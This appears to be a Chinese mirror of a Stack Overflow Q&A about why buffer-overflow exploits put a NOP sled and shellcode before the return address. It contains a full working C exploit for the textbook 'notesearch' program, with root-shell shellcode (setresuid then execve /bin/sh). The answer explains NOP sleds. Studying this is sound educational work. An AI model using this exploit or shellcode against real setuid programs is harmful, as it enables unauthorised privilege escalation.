c - 为什么返回地址之前是 "NOP-Block"和Shellcode?

标签 c assembly reverse-engineering buffer-overflow cracking

在这个例子中利用布局是[NOP-Block][Shellcode][Return Adress] 但是为什么我不能用我的 Shellcode 的地址覆盖原来的返回地址呢?

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]= 
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

int main(int argc, char *argv[]) {
   unsigned int i, *ptr, ret, offset=270;
   char *command, *buffer;

   command = (char *) malloc(200);
   bzero(command, 200); // zero out the new memory

   strcpy(command, "./notesearch \'"); // start command buffer
   buffer = command + strlen(command); // set buffer at the end

   if(argc > 1) // set offset
      offset = atoi(argv[1]);

   ret = (unsigned int) &i - offset; // set return address

   for(i=0; i < 160; i+=4) // fill buffer with return address
      *((unsigned int *)(buffer+i)) = ret;
   memset(buffer, 0x90, 60); // build NOP sled
   memcpy(buffer+60, shellcode, sizeof(shellcode)-1); 

   strcat(command, "\'");

   system(command); // run exploit
   free(command);
}

最佳答案

NOP-slide 是一种技术,当您无法准确预测 shell 执行时将从哪个偏移量开始执行时,您必须在序言中用 nop 填充 shellcode 以确保执行不会开始于你的 shellcode 的“中间”。

CPU 简单地滑过 nop 而不会影响除指令指针之外的任何寄存器。

在您的代码中,我认为您正在使用当前进程中的局部变量 i 的地址对 notesearch 中 main 的返回地址进行三角测量。根据编译器和平台,复制缓冲区(也是 argv[1])中执行开始的实际位置可能会偏离几个字节。因此,您需要添加几个字节的幻灯片以确保一切正常。

关于c - 为什么返回地址之前是 "NOP-Block"和Shellcode?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/48661233/

相关文章:

c - C头文件如何导入win32api函数?

python - 我可以在 Linux 上动态加载可执行文件吗?

c - malloc 复制中的段错误

memory - GDB 中的 x86 标签和 LEA

c - Netbeans主函数使用外部汇编函数

plugins - 如何为 ollydbg 2.x.x 设置插件?

command-line - 如何发现来源不明的未记录可执行文件的命令行选项(如果有)?

C 在按键时退出无限循环

c - 使用 Dynamic C 保存数据

c - 运行内存中存储的代码